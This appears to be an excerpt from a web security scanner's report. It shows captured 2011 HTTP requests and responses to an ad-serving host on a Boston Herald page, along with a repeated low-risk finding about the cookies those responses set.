custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb120773=5_[r^208WMuF4Lw)IE.826L=t?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP_MUEDZxdL5eBWHfHSmrEELwO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEoAUBAgUCAAIAAAAAaCEU6wAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251888%29%3Buf%28%27r%27%2C+151403%2C+1296251888%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2811%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2887%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28619%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28620%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28621%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2Fregional%2Fview%2F20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist%2Fsrvc%3Dhome%26position%3D4&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.5569272553548217%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 21:57:57 GMT Content-Length: 522
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-31727353_1296259318%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.weath_l-cm.sports_h-cm.ent_h-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D604786%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb781784=5_[r^208WMt+t%s!@@-#?/ty]?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP-d6bImG40osBWHfHSmrEEIVVUNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA3AUBAgUCAAUAAAAAVyHLDgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296258325%29%3Buf%28%27r%27%2C+151403%2C+1296258325%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2811%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2887%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28619%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28620%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28621%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb781784=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb461348=5_[r^208WMM2x@N!@@-##ICj)?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP-ZzLIcOH5QUBWHfHSmrEELIcENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA5gUBAgUCAAUAAAAAASKOJgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296265416%29%3Buf%28%27r%27%2C+116344%2C+1296265416%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; path=/; expires=Sun, 30-Jan-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Fri, 29-Apr-2011 01:43:36 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:43:36 GMT Content-Length: 826
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-48597195_1296251864%2C11d765b6a10b1b3%2CMiscellaneous%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D199062%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.3579352851957083%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<fQCe7?0P(*AuB-u**g1:XIC(WUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy6A3fm`:Idk3X!(*W2F2Hk''SykpRE%:434AnQ9O>WxYDWB13NOp+/5AIyhgU6ROEcF@:XJvR6qJ:uuL`8Q2Vw2t![$ph'S1S['D+Ir$>37Xp$KdW'FoQ)MSzM(Q66u2x%X_(L:Sjx('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o>Pj9!*^
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:57:44 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 21:57:44 GMT Content-Length: 664
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-256627_1296258325%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D357355%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: 